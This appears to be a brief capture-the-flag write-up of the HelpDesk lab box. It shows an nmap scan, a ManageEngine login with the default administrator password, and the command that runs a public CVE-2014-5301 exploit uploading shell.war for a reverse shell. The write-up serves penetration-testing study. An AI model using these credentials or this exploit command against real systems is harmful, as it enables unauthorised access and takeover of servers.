HelpDesk

Root Access via CVE-2014-5301 and Default Admin Credentials

Summary

  • The machine was running a vulnerable version of ManageEngine, which was misconfigured to allow Admin login with the default password.

  • Later, I discovered a public authenticated exploit to gain a shell on the box.

🧵Let's Unpack

Enumeration

nmap -sC -sN -A -oN nmapFull -p- -A 192.168.166.43

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  ms-wbt-server Microsoft Terminal Service
8080/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1

Enumerating port 8080 that is hosting ManageEngine Service

Misconfiguration found: Manage engine has enabled login using default credentials

administrator: administrator

Initial Foothold

We can use the following exploit to gain a shell on the box. Since it is an authenticated exploit, it requires a username and password, which we already have for this service.

# executing exploit to get reverse shell
python3 exploit.py 192.168.166.43 8080 administrator administrator shell.war 

> I actually got admin shell!!!

Last updated